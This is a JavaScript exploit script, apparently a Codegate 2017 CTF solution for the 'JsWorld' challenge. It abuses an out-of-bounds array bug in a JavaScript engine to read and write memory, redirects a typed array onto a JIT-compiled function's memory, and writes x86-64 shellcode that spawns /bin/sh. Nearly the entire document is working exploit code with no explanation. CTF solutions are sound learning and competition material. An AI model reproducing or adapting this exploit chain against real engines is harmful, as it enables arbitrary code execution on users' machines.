Codegate 2017 JsWorld

function d_to_i2(d){
     var a = new Uint32Array(new Float64Array([d]).buffer);
     return [a[1], a[0]];
}
 
function i2_to_d(x){
     return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0];
}
 
function i2_to_hex(i2){
        var v1 = ("00000000" + i2[0].toString(16)).substr(-8);
        var v2 = ("00000000" + i2[1].toString(16)).substr(-8);
        return [v1,v2];
}
 
function p_i2(d){
     return (i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1])
}
 
function jit_read(data1,data2) {
   print('\nABCD')
}
 
var a = new Array(1);
a[0] = 0x41414141;
 
var uint = new Uint32Array(1000);
for(var i =0;i<1000;i++) {
   uint[i] = 1000;
}
a.pop();
a.pop();
for(var i=0;;i++) {
   if(a[i]==1000) {
      break
   }
}
uo = i; //uint_offset
print('\n');
for(var j=0;j<500;j++) {
   jit_read('A','B');
}
var idx = 0;
 
for(var j=0;;j++) {
   if(p_i2(a[j])=='0000018000000191') {
      idx = j;
      break;
   }
}
 
uint_data = p_i2(a[uo+2]);
var shell = new Uint32Array(27);
shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
print('\n');
jit = p_i2(a[idx-2]);
a[uo+2] = (a[idx-2]); //uint data -> jit address
print('Jit: '+jit);
print('uint data: '+uint_data);
 
var hex = '';
var temp = '';
var idx = 0;
for(var i=0;i<shell.length;i+=4) {
    hex = '';
    for(var j=0;j<4;j++) { //uint32_t == 4byte
        if(shell[i+j]!=undefined)
            hex+=(shell.charCodeAt(i+j).toString(16));
    }
    hex = hex.split('');
    temp = '';
    for(var j=0;j<8;j+=2) {
        temp += hex[hex.length-j-2] + hex[hex.length-j-1];
    }
    uint[idx] = parseInt('0x'+temp);
    idx+=1;
 
}
uint[idx-1] = 0x050f3b;
jit_read('A','B');
 
 
//Math.atan(a);